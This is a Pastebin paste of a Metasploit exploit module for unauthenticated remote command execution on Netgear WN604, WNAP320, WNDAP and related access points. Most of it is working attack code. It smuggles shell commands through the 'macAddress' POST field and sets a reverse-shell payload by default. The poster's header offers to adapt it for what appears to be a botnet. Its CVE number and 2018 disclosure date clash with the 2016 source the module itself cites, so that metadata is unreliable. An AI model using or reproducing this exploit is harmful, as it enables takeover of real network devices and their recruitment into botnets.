SHARE
TWEET

[NETGEAR RCE][METASPLOIT][7 FIRMWARE] 28/11/18

xB4ckdoorREAL Nov 28th, 2018 204 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ## [WRITE YOURSELF IN PYTHON FOR M1R41, OR CONTACT ME. DISCORD: https://discord.gg/QDy3bUy OR skype: b4ckdoor.porn EDIT: TESTED AND #SHIT.
  2. # This module requires Metasploit: https://metasploit.com/download
  3. # Current source: https://github.com/rapid7/metasploit-framework
  4. ##
  5.  
  6. class MetasploitModule < Msf::Exploit::Remote
  7.   Rank = ExcellentRanking
  8.  
  9.   include Msf::Exploit::Remote::HttpClient
  10.   include Msf::Exploit::CmdStager
  11.  
  12.   def initialize(info = {})
  13.     super(update_info(info,
  14.       'Name'        => 'Netgear Devices Unauthenticated Remote Command Execution',
  15.       'Description' => %q{
  16.         From the CVE-2018-2555 page: (1) boardData102.php, (2) boardData103.php,
  17.         (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php in
  18.         Netgear WN604 before 3.3.3 and WN802Tv2, WNAP210v2, WNAP320, WNDAP350,
  19.         WNDAP360, and WNDAP660 before 3.5.5.0 allow remote attackers to execute
  20.         arbitrary commands.
  21.       },
  22.       'Author'      =>
  23.         [
  24.           'Daming Dominic Chen <ddchen[at]cs.cmu.edu>', # Vuln discovery
  25.         ],
  26.       'License'     => MSF_LICENSE,
  27.       'References'  =>
  28.         [
  29.           ['CVE', '2018-2555'],
  30.         ],
  31.       'DisclosureDate' => 'Nov 25 2018', # According to http://seclists.org/fulldisclosure/2016/Feb/112
  32.       'Privileged'     => true,
  33.       'Platform'       => 'linux',
  34.       'Arch'           => ARCH_MIPSBE,
  35.       'Payload'        => {},
  36.       'DefaultOptions' => {
  37.         'CMDSTAGER::FLAVOR' => 'wget',
  38.         'PAYLOAD'           => 'linux/mipsbe/shell_reverse_tcp',
  39.         'WfsDelay'          => 10 },
  40.       'Targets'        => [['Automatic', { }]],
  41.       'CmdStagerFlavor'=> %w{ echo printf wget },
  42.       'DefaultTarget'  => 0
  43.       ))
  44.       register_options(
  45.       [
  46.         OptString.new('TARGETURI', [true, 'Path of the vulnerable URI.', '/boardDataWW.php']), # boardDataWW.php
  47.         OptString.new('MAC_ADDRESS', [true, 'MAC address to use (default: random)', Rex::Text.rand_text_hex(12)])
  48.       ])
  49.   end
  50.  
  51.   # check for vulnerability existence
  52.   def check
  53.     fingerprint = Rex::Text.rand_text_alpha(12) # If vulnerability is present, we will get this back in the response
  54.     res = execute_command("echo #{fingerprint}") # the raw POST response
  55.  
  56.     unless res
  57.       vprint_error 'Connection failed'
  58.       return CheckCode::Unknown
  59.     end
  60.  
  61.     unless res.code == 200
  62.       return CheckCode::Safe
  63.     end
  64.  
  65.     unless res.get_html_document.at('input').to_s.include? fingerprint
  66.       return CheckCode::Safe
  67.     end
  68.  
  69.     CheckCode::Vulnerable
  70.   end
  71.  
  72.   # execute a command, or simply send a POST request
  73.   def execute_command(cmd, opts = {})
  74.     vars_post = {
  75.       'macAddress' => "#{datastore['MAC_ADDRESS']};#{cmd};",
  76.       'reginfo' => '1',
  77.       'writeData' => 'Submit'
  78.     }
  79.  
  80.     send_request_cgi({
  81.       'method'  => 'POST',
  82.       'headers' => { 'Connection' => 'Keep-Alive' },
  83.       'uri'     => normalize_uri(target_uri.path),
  84.       'vars_post' => vars_post
  85.     })
  86.   rescue ::Rex::ConnectionError
  87.     fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the target!")
  88.   end
  89.  
  90.   # the exploit method
  91.   def exploit
  92.     #run a check before attempting to exploit
  93.     unless [CheckCode::Vulnerable].include? check
  94.       fail_with Failure::NotVulnerable, 'Target is most likely not vulnerable!'
  95.     end
  96.  
  97.     execute_cmdstager(linemax: 2048) # maximum 130,000
  98.   end
  99.  
  100. end
  101.  
  102. #[2018-11-28]
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top